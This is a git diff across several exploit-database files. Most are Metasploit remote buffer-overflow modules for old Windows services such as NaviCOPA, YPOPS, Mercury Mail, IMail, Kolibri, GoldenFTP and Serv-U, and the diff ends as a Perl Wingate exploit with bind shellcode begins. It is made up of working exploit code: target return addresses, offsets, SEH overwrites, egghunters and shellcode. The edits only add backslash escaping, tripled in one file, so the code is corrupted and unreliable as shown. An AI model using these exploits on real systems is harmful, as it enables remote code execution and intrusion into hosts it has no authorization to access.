-			sploit[seh_offset - 4, 2] = "\xeb\xf9"
-			sploit[seh_offset    , 4] = [ target.ret ].pack('V')
+			sploit[seh_offset - 9, 5] = \"\\xe9\" + [sc_base - seh_offset + 4].pack(\'V\')
+			sploit[seh_offset - 4, 2] = \"\\xeb\\xf9\"
+			sploit[seh_offset    , 4] = [ target.ret ].pack(\'V\')
 		}
 
-		print_status("Trying target #{target.name}...")
+		print_status(\"Trying target #{target.name}...\")
 		sock.put(uri_start + sploit + uri_end)
 
 		resp = sock.get_once
-		if (resp and (m = resp.match(/(.*)<\/title>/i)))
-			print_error("The exploit failed : HTTP Status Code '#{m[1]}' received :-(")
+		if (resp and (m = resp.match(/<title>(.*)<\\/title>/i)))
+			print_error(\"The exploit failed : HTTP Status Code \'#{m[1]}\' received :-(\")
 		end
 
 		handler
diff --git a/platforms/windows/remote/16808.rb b/platforms/windows/remote/16808.rb
index ae8c6e667..d2670be31 100755
--- a/platforms/windows/remote/16808.rb
+++ b/platforms/windows/remote/16808.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -20,39 +20,39 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'NaviCOPA 2.0.1 URL Handling Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'NaviCOPA 2.0.1 URL Handling Buffer Overflow\',
+			\'Description\'    => %q{
 				This module exploits a stack buffer overflow in NaviCOPA 2.0.1.
 				The vulnerability is caused due to a boundary error within the
 				handling of URL parameters.
 			},
-			'Author'         => 'MC',
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9797 $',
-			'References'     =>
+			\'Author\'         => \'MC\',
+			\'License\'        => MSF_LICENSE,
+			\'Version\'        => \'$Revision: 9797 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2006-5112' ],
-					[ 'OSVDB', '29257' ],
-					[ 'BID', '20250' ],
+					[ \'CVE\', \'2006-5112\' ],
+					[ \'OSVDB\', \'29257\' ],
+					[ \'BID\', \'20250\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'thread',
+					\'EXITFUNC\' => \'thread\',
 				},
-			'Privileged'     => true,
-			'Payload'        =>
+			\'Privileged\'     => true,
+			\'Payload\'        =>
 				{
-					'Space'    => 400,
-					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-					'StackAdjustment' => -3500,
+					\'Space\'    => 400,
+					\'BadChars\' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",
+					\'StackAdjustment\' => -3500,
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					['NaviCOPA 2.0.1 Universal', { 'Ret' => 0x1009b4ff }], # IV320009.dll
+					[\'NaviCOPA 2.0.1 Universal\', { \'Ret\' => 0x1009b4ff }], # IV320009.dll
 				],
-			'DisclosureDate' => 'Sep 28 2006',
-			'DefaultTarget'  => 0))
+			\'DisclosureDate\' => \'Sep 28 2006\',
+			\'DefaultTarget\'  => 0))
 
 		register_options(
 			[
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		connect
 
-		sock.put("GET / HTTP/1.0\r\n\r\n")
+		sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")
 		resp = sock.get_once
 		disconnect
 
@@ -77,13 +77,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		connect
 
 		sploit =  rand_text_alphanumeric(228, payload_badchars)
-		sploit << [target.ret].pack('V') + payload.encoded
+		sploit << [target.ret].pack(\'V\') + payload.encoded
 
-		uri = '/' + sploit
+		uri = \'/\' + sploit
 
-		res = "GET #{uri} HTTP/1.1\r\n\r\n"
+		res = \"GET #{uri} HTTP/1.1\\r\\n\\r\\n\"
 
-		print_status("Trying target %s" % target.name)
+		print_status(\"Trying target %s\" % target.name)
 
 		sock.put(res)
 		sock.close
diff --git a/platforms/windows/remote/16818.rb b/platforms/windows/remote/16818.rb
index 9f1958980..8c79e2c8e 100755
--- a/platforms/windows/remote/16818.rb
+++ b/platforms/windows/remote/16818.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,8 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'YPOPS 0.6 Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'YPOPS 0.6 Buffer Overflow\',
+			\'Description\'    => %q{
 					This module exploits a stack buffer overflow in the YPOPS POP3
 				service.
 
@@ -27,53 +27,53 @@ class Metasploit3 < Msf::Exploit::Remote
 				Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to
 				jmp ebx opcode in ws_32.dll
 			},
-			'Author'         => [ 'acaro <acaro@jervus.it>' ],
-			'Version'        => '$Revision: 9262 $',
-			'References'     =>
+			\'Author\'         => [ \'acaro <acaro@jervus.it>\' ],
+			\'Version\'        => \'$Revision: 9262 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2004-1558'],
-					[ 'OSVDB', '10367'],
-					[ 'BID', '11256'],
-					[ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],
+					[ \'CVE\', \'2004-1558\'],
+					[ \'OSVDB\', \'10367\'],
+					[ \'BID\', \'11256\'],
+					[ \'URL\', \'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html\'],
 				],
-			'Platform'       => 'win',
-			'Privileged'     => false,
-			'Payload'        =>
+			\'Platform\'       => \'win\',
+			\'Privileged\'     => false,
+			\'Payload\'        =>
 				{
-					'Space'    => 1200,
-					'BadChars' => "\x00\x25",
-					'MinNops'  => 106,
+					\'Space\'    => 1200,
+					\'BadChars\' => \"\\x00\\x25\",
+					\'MinNops\'  => 106,
 				},
-			'Targets'        =>
+			\'Targets\'        =>
 				[
-					[ 'Windows 2000 SP0 Italian',   { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],
-					[ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],
-					[ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],
-					[ 'Windows 2000 SP0 English',   { 'Ret' => 0x75036113, 'Offset' => 503 }, ],
-					[ 'Windows 2000 SP1 English',   { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],
-					[ 'Windows 2000 SP2 English',   { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],
-					[ 'Windows 2000 SP3 English',   { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],
-					[ 'Windows 2000 SP4 English',   { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],
-					[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],
-					[ 'Windows XP SP2 English',     { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],
-					[ 'Windows 2003 SP0 English',   { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],
-					[ 'Windows 2003 SP1 English',   { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],
+					[ \'Windows 2000 SP0 Italian\',   { \'Ret\' => 0x74fe6113, \'Offset\' => 503 }, ],
+					[ \'Windows 2000 Advanced Server Italian SP4\', { \'Ret\' => 0x74fe16e2, \'Offset\' => 503 }, ],
+					[ \'Windows 2000 Advanced Server SP3 English\', { \'Ret\' => 0x74fe22f3, \'Offset\' => 503 }, ],
+					[ \'Windows 2000 SP0 English\',   { \'Ret\' => 0x75036113, \'Offset\' => 503 }, ],
+					[ \'Windows 2000 SP1 English\',   { \'Ret\' => 0x750317b2, \'Offset\' => 503 }, ],
+					[ \'Windows 2000 SP2 English\',   { \'Ret\' => 0x7503435b, \'Offset\' => 503 }, ],
+					[ \'Windows 2000 SP3 English\',   { \'Ret\' => 0x750322f3, \'Offset\' => 503 }, ],
+					[ \'Windows 2000 SP4 English\',   { \'Ret\' => 0x750316e2, \'Offset\' => 503 }, ],
+					[ \'Windows XP SP0-SP1 English\', { \'Ret\' => 0x71ab1636, \'Offset\' => 503 }, ],
+					[ \'Windows XP SP2 English\',     { \'Ret\' => 0x71ab773b, \'Offset\' => 503 }, ],
+					[ \'Windows 2003 SP0 English\',   { \'Ret\' => 0x71c04202, \'Offset\' => 503 }, ],
+					[ \'Windows 2003 SP1 English\',   { \'Ret\' => 0x71c05fb0, \'Offset\' => 503 }, ],
 				],
-			'DisclosureDate' => 'Sep 27 2004'))
+			\'DisclosureDate\' => \'Sep 27 2004\'))
 	end
 
 	def check
 		connect
 		disconnect
 
-		banner.gsub!(/\n/, '')
+		banner.gsub!(/\\n/, \'\')
 
 		if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/
-			print_status("Vulnerable SMTP server: #{banner}")
+			print_status(\"Vulnerable SMTP server: #{banner}\")
 			return Exploit::CheckCode::Detected
 		end
 
-		print_status("Unknown SMTP server: #{banner}")
+		print_status(\"Unknown SMTP server: #{banner}\")
 		return Exploit::CheckCode::Safe
 	end
 
@@ -81,12 +81,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		connect
 
 		pattern =
-			rand_text_alpha(target['Offset'] - payload.encoded.length) +
+			rand_text_alpha(target[\'Offset\'] - payload.encoded.length) +
 			payload.encoded +
-			[target.ret].pack('V') +
-			"\n"
+			[target.ret].pack(\'V\') +
+			\"\\n\"
 
-		print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}")
+		print_status(\"Trying #{target.name} using jmp ebx at #{\"0x%.8x\" % target.ret}\")
 
 		sock.put(pattern)
 
diff --git a/platforms/windows/remote/16821.rb b/platforms/windows/remote/16821.rb
index b951fe0e9..1b775ec9e 100755
--- a/platforms/windows/remote/16821.rb
+++ b/platforms/windows/remote/16821.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -18,38 +18,38 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow\',
+			\'Description\'    => %q{
 					This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.
 				By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker
 				may be able to execute arbitrary code.
 			},
-			'Author'         => [ 'MC' ],
-			'Version'        => '$Revision: 9583 $',
-			'References'     =>
+			\'Author\'         => [ \'MC\' ],
+			\'Version\'        => \'$Revision: 9583 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2007-4440' ],
-					[ 'OSVDB', '39669' ],
-					[ 'BID', '25357' ],
+					[ \'CVE\', \'2007-4440\' ],
+					[ \'OSVDB\', \'39669\' ],
+					[ \'BID\', \'25357\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'thread',
+					\'EXITFUNC\' => \'thread\',
 				},
-			'Platform'       => 'win',
-			'Privileged'     => true,
-			'Payload'        =>
+			\'Platform\'       => \'win\',
+			\'Privileged\'     => true,
+			\'Payload\'        =>
 				{
-					'Space'    => 600,
-					'BadChars' => "\x00\x0a\x0d\x20\x25",
-					'StackAdjustment' => -3500,
+					\'Space\'    => 600,
+					\'BadChars\' => \"\\x00\\x0a\\x0d\\x20\\x25\",
+					\'StackAdjustment\' => -3500,
 				},
-			'Targets'        =>
+			\'Targets\'        =>
 				[
-					[ 'Mercury Mail Transport System 4.51',	{ 'Ret' => 0x258d0d1e } ], # ter32.dll
+					[ \'Mercury Mail Transport System 4.51\',	{ \'Ret\' => 0x258d0d1e } ], # ter32.dll
 				],
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Aug 18 2007'))
+			\'DefaultTarget\'  => 0,
+			\'DisclosureDate\' => \'Aug 18 2007\'))
 
 		register_options([ Opt::RPORT(25) ], self.class)
 	end
@@ -59,22 +59,22 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		sock.get_once
 
-		sock.put("EHLO\r\n")
+		sock.put(\"EHLO\\r\\n\")
 
 		sock.get_once
 
-		sock.put("AUTH CRAM-MD5\r\n")
+		sock.put(\"AUTH CRAM-MD5\\r\\n\")
 
 		sock.get_once
 		select(nil,nil,nil,0.25)
 
-		buffer =  rand_text_alpha_upper(204) + [target.ret].pack('V')
+		buffer =  rand_text_alpha_upper(204) + [target.ret].pack(\'V\')
 		buffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length)
 
 		sploit = Rex::Text.encode_base64(buffer)
 
-		print_status("Trying target #{target.name}...")
-		sock.put(sploit + "\r\n")
+		print_status(\"Trying target #{target.name}...\")
+		sock.put(sploit + \"\\r\\n\")
 
 		handler
 		disconnect
diff --git a/platforms/windows/remote/16824.rb b/platforms/windows/remote/16824.rb
index 0242fc9d4..b801d7c32 100755
--- a/platforms/windows/remote/16824.rb
+++ b/platforms/windows/remote/16824.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \\\'msf/core\\\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,36 +18,36 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'IMail LDAP Service Buffer Overflow',
-			'Description'    => %q{
+			\\\'Name\\\'           => \\\'IMail LDAP Service Buffer Overflow\\\',
+			\\\'Description\\\'    => %q{
 					This exploits a buffer overflow in the LDAP service that is
 				part of the IMail product. This module was tested against
 				version 7.10 and 8.5, both running on Windows 2000.
 			},
-			'Author'         => [ 'hdm' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9179 $',
-			'References'     =>
+			\\\'Author\\\'         => [ \\\'hdm\\\' ],
+			\\\'License\\\'        => MSF_LICENSE,
+			\\\'Version\\\'        => \\\'$Revision: 9179 $\\\',
+			\\\'References\\\'     =>
 				[
-					[ 'CVE', '2004-0297'],
-					[ 'OSVDB', '3984'],
-					[ 'BID', '9682'],
-					[ 'URL', 'http://secunia.com/advisories/10880/'],
+					[ \\\'CVE\\\', \\\'2004-0297\\\'],
+					[ \\\'OSVDB\\\', \\\'3984\\\'],
+					[ \\\'BID\\\', \\\'9682\\\'],
+					[ \\\'URL\\\', \\\'http://secunia.com/advisories/10880/\\\'],
 				],
-			'Privileged'     => false,
-			'Payload'        =>
+			\\\'Privileged\\\'     => false,
+			\\\'Payload\\\'        =>
 				{
-					'Space'    => 1024,
-					'BadChars' => "\x00\x0a\x0d\x20",
+					\\\'Space\\\'    => 1024,
+					\\\'BadChars\\\' => \\\"\\\\x00\\\\x0a\\\\x0d\\\\x20\\\",
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\\\'Platform\\\'       => \\\'win\\\',
+			\\\'Targets\\\'        =>
 				[
-					["Windows 2000 English",   { 'Ret' => 0x75023386 }],
-					["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }],
+					[\\\"Windows 2000 English\\\",   { \\\'Ret\\\' => 0x75023386 }],
+					[\\\"Windows 2000 IMail 8.x\\\", { \\\'Ret\\\' => 0x1002a619 }],
 				],
-			'DisclosureDate' => 'Feb 17 2004',
-			'DefaultTarget' => 0))
+			\\\'DisclosureDate\\\' => \\\'Feb 17 2004\\\',
+			\\\'DefaultTarget\\\' => 0))
 
 		register_options(
 			[
@@ -58,16 +58,16 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect
 
-		buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20"
-		buf << "\xcc" * 5000
+		buf = \\\"\\\\x30\\\\x82\\\\x0a\\\\x3d\\\\x02\\\\x01\\\\x01\\\\x60\\\\x82\\\\x01\\\\x36\\\\x02\\\\xff\\\\xff\\\\xff\\\\xff\\\\x20\\\"
+		buf << \\\"\\\\xcc\\\" * 5000
 
 		# Universal exploit, targets 6.x, 7.x, and 8.x at once ;)
 		# Thanks for johnny cyberpunk for 6/7 vs 8 diffs
 
-		buf[77, 4] = "\xeb\x06"
-		buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x
-		buf[85, 4] = "\xeb\x06"
-		buf[89, 4] = [target.ret].pack('V') # 8.x
+		buf[77, 4] = \\\"\\\\xeb\\\\x06\\\"
+		buf[81, 4] = [target.ret].pack(\\\'V\\\') # 6.x, 7.x
+		buf[85, 4] = \\\"\\\\xeb\\\\x06\\\"
+		buf[89, 4] = [target.ret].pack(\\\'V\\\') # 8.x
 		buf[93, payload.encoded.length] = payload.encoded
 
 		sock.put(buf)
diff --git a/platforms/windows/remote/16970.rb b/platforms/windows/remote/16970.rb
index c97da148b..6a0dfb7a4 100755
--- a/platforms/windows/remote/16970.rb
+++ b/platforms/windows/remote/16970.rb
@@ -9,53 +9,53 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
 
-	HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] }
+	HttpFingerprint = { :pattern => [ /kolibri-2\\.0/ ] }
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Egghunter
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow',
-			'Description'    => %q{This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.},
-			'Author'         => 
+			\'Name\'           => \'Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow\',
+			\'Description\'    => %q{This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.},
+			\'Author\'         => 
 					[ 
-						'mr_me <steventhomasseeley@gmail.com>', # msf
-						'TheLeader' # original exploit
+						\'mr_me <steventhomasseeley@gmail.com>\', # msf
+						\'TheLeader\' # original exploit
 					],
-			'Version'        => '$Revision: 10887 $',
-			'References'     =>
+			\'Version\'        => \'$Revision: 10887 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2002-2268' ],
-					[ 'OSVDB', '70808' ],
-					[ 'BID', '6289' ],
-					[ 'URL', 'http://www.exploit-db.com/exploits/15834/' ],
+					[ \'CVE\', \'2002-2268\' ],
+					[ \'OSVDB\', \'70808\' ],
+					[ \'BID\', \'6289\' ],
+					[ \'URL\', \'http://www.exploit-db.com/exploits/15834/\' ],
 				],
-			'Privileged'     => false,
-			'Payload'        =>
+			\'Privileged\'     => false,
+			\'Payload\'        =>
 				{
-					'Space'       => 3000,
-					'DisableNops' => true,
-					'BadChars'    => "\x00\x0d\x0a\x3d\x20\x3f",
+					\'Space\'       => 3000,
+					\'DisableNops\' => true,
+					\'BadChars\'    => \"\\x00\\x0d\\x0a\\x3d\\x20\\x3f\",
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'Windows XP sp3', { 'Ret' => 0x7E429353 } ] ,
-					[ 'Windows Server 2003 sp2', { 'Ret' => 0x76F73BC3 } ] ,
+					[ \'Windows XP sp3\', { \'Ret\' => 0x7E429353 } ] ,
+					[ \'Windows Server 2003 sp2\', { \'Ret\' => 0x76F73BC3 } ] ,
 				],
-			'DisclosureDate' => 'Dec 26 2010',
-			'DefaultTarget'  => 0))
+			\'DisclosureDate\' => \'Dec 26 2010\',
+			\'DefaultTarget\'  => 0))
 	end
 
 	def check
 		info = http_fingerprint
-		if info and (info =~ /kolibri-2\.0/)
+		if info and (info =~ /kolibri-2\\.0/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		Exploit::CheckCode::Safe
@@ -65,15 +65,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		#7E429353    FFE4            JMP     ESP
 		# For a reliable and large payload, we use an egg hunter
 		# and direct RET to execute code
-		print_status("Sending request...")
+		print_status(\"Sending request...\")
 		eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars)
-		sploit = Rex::Text.rand_text_alphanumeric(515) + [target.ret].pack('V')
+		sploit = Rex::Text.rand_text_alphanumeric(515) + [target.ret].pack(\'V\')
 		sploit << eh_stub
 		send_request_raw({
-			'uri'     => "/" + sploit,
-			'version' => '1.1',
-			'method'  => 'HEAD',
-			'headers' => {'Content-Type' => eh_egg},
+			\'uri\'     => \"/\" + sploit,
+			\'version\' => \'1.1\',
+			\'method\'  => \'HEAD\',
+			\'headers\' => {\'Content-Type\' => eh_egg},
 		})
 
 		handler
diff --git a/platforms/windows/remote/17355.rb b/platforms/windows/remote/17355.rb
index 0b3aa77d9..77ad0d656 100755
--- a/platforms/windows/remote/17355.rb
+++ b/platforms/windows/remote/17355.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,49 +18,49 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'GoldenFTP PASS Stack Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'GoldenFTP PASS Stack Buffer Overflow\',
+			\'Description\'    => %q{
 					This module exploits a vulnerability in the Golden
 				FTP service. This module uses the PASS command to trigger the overflow.
 			},
-			'Author'         => [ 'bannedit' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 12812 $',
-			'References'     =>
+			\'Author\'         => [ \'bannedit\' ],
+			\'License\'        => MSF_LICENSE,
+			\'Version\'        => \'$Revision: 12812 $\',
+			\'References\'     =>
 				[
-					[ 'BID', '45957 '],
-					[ 'URL', 'http://www.exploit-db.com/exploits/16036/'],
+					[ \'BID\', \'45957 \'],
+					[ \'URL\', \'http://www.exploit-db.com/exploits/16036/\'],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'seh',
+					\'EXITFUNC\' => \'seh\',
 				},
-			'Privileged'     => false,
-			'Payload'        =>
+			\'Privileged\'     => false,
+			\'Payload\'        =>
 				{
-					'Space'    => 350,
-					'BadChars' => "\x00\x0a\x0d",
+					\'Space\'    => 350,
+					\'BadChars\' => \"\\x00\\x0a\\x0d\",
 				},
-			'Platform'       => ['win'],
-			'Targets'        =>
+			\'Platform\'       => [\'win\'],
+			\'Targets\'        =>
 				[
 					[
-						'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011
+						\'Golden FTP 4.70 Universal\', # Tested OK - bannedit 05/31/2011
 						{
-							'Platform' => 'win',
-							'Ret'      => 0x00a93ca6,
+							\'Platform\' => \'win\',
+							\'Ret\'      => 0x00a93ca6,
 						},
 					]
 
 				],
-			'DisclosureDate' => 'Jan 23 2011'))
+			\'DisclosureDate\' => \'Jan 23 2011\'))
 	end
 	
 	def check
 		connect
 		disconnect
-		print_status("FTP Banner: #{banner}".strip)
-		if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70"
+		print_status(\"FTP Banner: #{banner}\".strip)
+		if banner =~ /Golden FTP Server ready v(4\\.\\d{2})/ and $1 == \"4.70\"
 			return Exploit::CheckCode::Appears
 		else
 			return Exploit::CheckCode::Safe
@@ -68,21 +68,21 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		if datastore['RHOST'].length < 15
-			pad = make_nops(1) * (15 - datastore['RHOST'].length)
+		if datastore[\'RHOST\'].length < 15
+			pad = make_nops(1) * (15 - datastore[\'RHOST\'].length)
 		end
 		
 		sploit = make_nops(4) * 38
 		sploit << payload.encoded
 		sploit << pad
 		sploit << make_nops(1) * (528 - sploit.length)
-		sploit << [target.ret].pack('V')
+		sploit << [target.ret].pack(\'V\')
 
-		print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")
+		print_status(\"Connecting to #{datastore[\'RHOST\']}:#{datastore[\'RPORT\']}\")
 		begin
 			connect
-			send_user("anonymous")
-			send_cmd(['PASS', sploit], false)
+			send_user(\"anonymous\")
+			send_cmd([\'PASS\', sploit], false)
 			handler
 		rescue EOFError
 		end
diff --git a/platforms/windows/remote/18190.rb b/platforms/windows/remote/18190.rb
index 00a254b21..94df92429 100755
--- a/platforms/windows/remote/18190.rb
+++ b/platforms/windows/remote/18190.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Serv-U FTP Server <4.2 Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'Serv-U FTP Server <4.2 Buffer Overflow\',
+			\'Description\'    => %q{
 				This module exploits a stack buffer overflow in the site chmod command
 				in versions of Serv-U FTP Server prior to 4.2.
 
 				You must have valid credentials to trigger this vulnerability. Exploitation
 				also leaves the service in a non-functional state.
 			},
-			'Author'         => 'thelightcosine <thelightcosine[at]metasploit.com>',
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
+			\'Author\'         => \'thelightcosine <thelightcosine[at]metasploit.com>\',
+			\'License\'        => MSF_LICENSE,
+			\'Version\'        => \'$Revision$\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2004-2111'],
-					[ 'BID', '9483'],
+					[ \'CVE\', \'2004-2111\'],
+					[ \'BID\', \'9483\'],
 				],
-			'Privileged'     => true,
-			'DefaultOptions' =>
+			\'Privileged\'     => true,
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'thread',
+					\'EXITFUNC\' => \'thread\',
 				},
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'BadChars'    => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
-					'DisableNops' => true,
+					\'BadChars\'    => \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\",
+					\'DisableNops\' => true,
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'Windows 2000 SP0-4 EN', {
-						'Ret'    => 0x750212bc, #WS2HELP.DLL
-						'Offset' => 396 } ],
-					[ 'Windows XP SP0-1 EN', {
-						'Ret'    => 0x71aa388f, #WS2HELP.DLL
-						'Offset' => 394 } ]
+					[ \'Windows 2000 SP0-4 EN\', {
+						\'Ret\'    => 0x750212bc, #WS2HELP.DLL
+						\'Offset\' => 396 } ],
+					[ \'Windows XP SP0-1 EN\', {
+						\'Ret\'    => 0x71aa388f, #WS2HELP.DLL
+						\'Offset\' => 394 } ]
 				],
-			'DisclosureDate' => 'Dec 31 2004',
-			'DefaultTarget'  => 0))
+			\'DisclosureDate\' => \'Dec 31 2004\',
+			\'DefaultTarget\'  => 0))
 	end
 
 	def check
 		connect
 		disconnect
 
-		if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
+		if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\\d)/)
 			return Exploit::CheckCode::Vulnerable
 		end
 			return Exploit::CheckCode::Safe
@@ -76,23 +76,23 @@ class Metasploit3 < Msf::Exploit::Remote
 		eggoptions =
 		{
 			:checksum => true,
-			:eggtag => "W00T"
+			:eggtag => \"W00T\"
 		}
 
 		hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
 
 
-		buffer = "chmod 777 "
-		buffer <<  make_nops(target['Offset'] - egg.length - hunter.length)
+		buffer = \"chmod 777 \"
+		buffer <<  make_nops(target[\'Offset\'] - egg.length - hunter.length)
 		buffer << egg
 		buffer << hunter
-		buffer << "\xeb\xc9\x41\x41"	#nseh, jump back to egghunter
-		buffer << [target.ret].pack('V')	#seh
+		buffer << \"\\xeb\\xc9\\x41\\x41\"	#nseh, jump back to egghunter
+		buffer << [target.ret].pack(\'V\')	#seh
 		buffer << rand_text(5000)
 
-		print_status("Trying target #{target.name}...")
+		print_status(\"Trying target #{target.name}...\")
 
-		send_cmd( ['SITE', buffer] , false)
+		send_cmd( [\'SITE\', buffer] , false)
 
 		handler
 		disconnect
diff --git a/platforms/windows/remote/1885.pl b/platforms/windows/remote/1885.pl
index 962d4ce8c..f69a16d55 100755
--- a/platforms/windows/remote/1885.pl
+++ b/platforms/windows/remote/1885.pl
@@ -1,75 +1,75 @@
-### *** Proof of concept (not for "in the wild" kiddies) ***
+### *** Proof of concept (not for \"in the wild\" kiddies) ***
 ### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
 ### by kcope in 2006
 ###
 use IO::Socket;
 
-if ($ARGV[0] eq "")
+if ($ARGV[0] eq \"\")
 {
- print "param1 = remote host";
+ print \"param1 = remote host\";
  exit;
 }
 
 # win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
 my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
